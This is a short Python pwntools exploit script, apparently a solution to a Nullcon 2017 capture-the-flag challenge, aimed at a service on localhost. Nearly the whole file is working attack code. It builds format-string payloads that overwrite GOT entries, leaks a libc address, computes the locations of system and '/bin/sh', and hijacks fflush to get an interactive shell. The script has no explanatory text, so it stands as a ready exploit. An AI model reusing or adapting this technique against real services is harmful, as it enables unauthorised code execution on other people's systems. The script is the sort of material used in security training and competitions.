null.py

#level2
#!/usr/bin/env python
#coding: utf-8
 
from pwn import *
 
p = remote('127.0.0.1', 9002)
 
raw_input('?\n')
 
#offset
system_offset = 0x22860
binsh_offset = 0x14346b
_execv = 0x0804B044
_validate = 0x08048BEA
_puts = 0x0804B034
_shutdown = 0x0804B068
___stack_chk_fail = 0x0804B024
offset = 64
 
#Payload to rollback
write = {_execv: _validate, ___stack_chk_fail: _validate}
payload1 = 'AA' #wtf?
payload1 += fmtstr_payload(offset , write, numbwritten=24, write_size='short')
payload1 += '%115$p' #leak
print 'payload1: %s' %payload1
 
p.sendlineafter(': ', payload1)
p.sendlineafter('password: ', 'Nullcon2017')
 
"""#Payload to leak libc
payload2 =
p.sendlineafter('name: ', payload2)
p.sendlineafter('password: ', 'Nullcon2017')"""
p.recvuntil('0x')
__libc_start_main = int(p.recv(8), 16) - 247
 
log.info('__libc_start_main: %#x', __libc_start_main)
 
#Calculate
fflush = 0x0804B018
system = system_offset + __libc_start_main
binsh = binsh_offset + __libc_start_main
stdout = 0x0804B084
 
#payload to ret2libc
write = {stdout: binsh, fflush: system}
 
payload = 'BB' #Wtf?
payload += fmtstr_payload(offset, write, numbwritten=24, write_size='short')
print payload + '\n' + str(len(payload))
 
p.sendlineafter('name: ', payload)
p.sendlineafter('password: ', 'Nullcon2017')
 
p.interactive()